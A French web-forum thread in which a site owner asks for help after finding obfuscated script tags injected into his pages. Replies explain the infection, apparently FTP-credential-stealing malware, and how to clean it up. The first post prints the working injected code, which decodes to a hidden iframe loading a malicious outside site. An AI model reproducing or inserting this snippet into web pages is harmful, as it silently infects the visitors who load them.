Site piraté morceau de code et balise insérées dans mes pages

[hx.jonathan]

Salut à tous,

il semble que mon site soit piraté :

"amisphereclub.be"

Si vous regarder le code source de la page index tout en bas, vous verrez ceci :

><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6b%73%64%68%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6d%61%67%65%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6b%73%64%68%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6d%61%67%65%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script>

Dans la page Nos atcivités j'ai ceci en fin de code :

<bb1><!---1503613358---><bb2>

Pareil sur la page Le comité.

Dans lien c'est encore plus bizarre.
Dans Devenir membre même chose :

<bb1><!---1503613358---><bb2>

Si vous pouviez me donner votre avis sur toutes ces insertions de code, ce serait cool.

Merci à tous.

John

 

[ybet]

1. tu enlève ton lien ... ton site envoi directement 1 trojan aux visiteurs via ce script.
2. deux solutions, soit c'est le serveur qui est vérolé (là c'est prévenir ton hébergeur), soit c'est directement ton site. Dans tous les cas, tu supprime l'entièreté, tu change de mot de passe ftp et tu réinstalle le site. Vérifie quand même que les codes ne sont pas directement sur les codes sources de ton ordinateur

 

[hx.jonathan]

Voilà j'ai supprimé l'url désolé pour ça.

Question sécurité j'ai remarqué que même quand je nettoie mes pages, les codes reviennent après 2ou 3 semaines.
En local pas de soucis. C'est en ligne que ça coince.

D'autres idées ?

John

 

[ybet]

Voilà j'ai supprimé l'url désolé pour ça.

Question sécurité j'ai remarqué que même quand je nettoie mes pages, les codes reviennent après 2ou 3 semaines.
En local pas de soucis. C'est en ligne que ça coince.

D'autres idées ?

John

C'est ton mon de passe qui est piraté . Si tu l'a déjà changé, une berstiole est directement implatée dans ton propre PC et renvoit les login ftp sur un site qui lui remodifie tes pages à fait.

 

[hx.jonathan]

Donc pour toi c'est le mot de passe FTP que j"utilise dans filezilla qui est craqué ?
Imaginons que je change le mot de passe. Qu'est ce qui empêcherait que j'ai à nouveau le même souci par la suite. Car il y a bien un moment ou l'attaque à du commencer.


Merci de votre aide, j'espère pouvoir avancer petit à petit.

John

 

[amph37]

le truc c'est de ne surtout pas enregistrer ton mot de passe sur fillezilla. Il est stocké en clair dans un fichier. C'est ça qui est réccupéré par le trojan. tu dois le taper a chaque fois. Il ne pourra ainsi plus etre repris.
Et bien sur nettoyage pc...

 

[hx.jonathan]

Ah merde alors, c'est ça le truc. Et bien je vais donc essayer de le changer, de faire une recherche de TROJAN avec AVIRA Antivir, de nettoyer mes pages de leur code malicieu et ensuite réuploader le site.

D'autres conseil ? Pour vous, il n'y a vraiment que ça au vu des infections que j'ai mentionné ? Les connaissez-vous ?


John

 

[Julia41]

Si tu "deofusce" ton code, tu verras que ça correspond à un iframe d'un site pas gentil.
Tu dois voir si ça ne vient pas d'un script d'upload (en dehors de ton FTP).
En tout cas, repasse tout ton script page par page en vérifiant le javascript. Mais ça pourrait venir d'un fichier simple d'upload qui permettrait la modif. Pour tes fichiers d'index mets les en chmod 404, ça te permettra déjà de voir s'ils sont modifiés par FTP ou par apache.

 

[epsilon74]

déjà si tu es en dédié, regardes simplement le logs des connections ftp. vérifie en particulier les connections qui auraient eu lieu aux dates et heures de modifs du fichier infecté.
si tu as une connection de logué sous ton compte à ce moment là et que tu n'as pas souvenir de l'avoir faite, c'est bien ton pc qui est infecté et tes codes ftp ont été récupéré.

une solution :
- nettoyer les fichiers infecté sur le serveur
- changer les accès de ton compte ftp et ne pas les inscrire sur ton pc (filezilla ou autre. meme le fait de les taper au moment du login suffit)
- nettoyer complètement ton pc (attention, tout les antivirus ne détectent pas cette merde nommée gumblar ou équivalent)
- mettre à jour les soft Adobe présent sur ton pc (acrobat readar, flash...). il semblerait que gumblar exploite une faille de certaines version de ces soft (à confirmer mais dans le doute...)
- tu peux réutiliser ton compte ftp depuis ton pc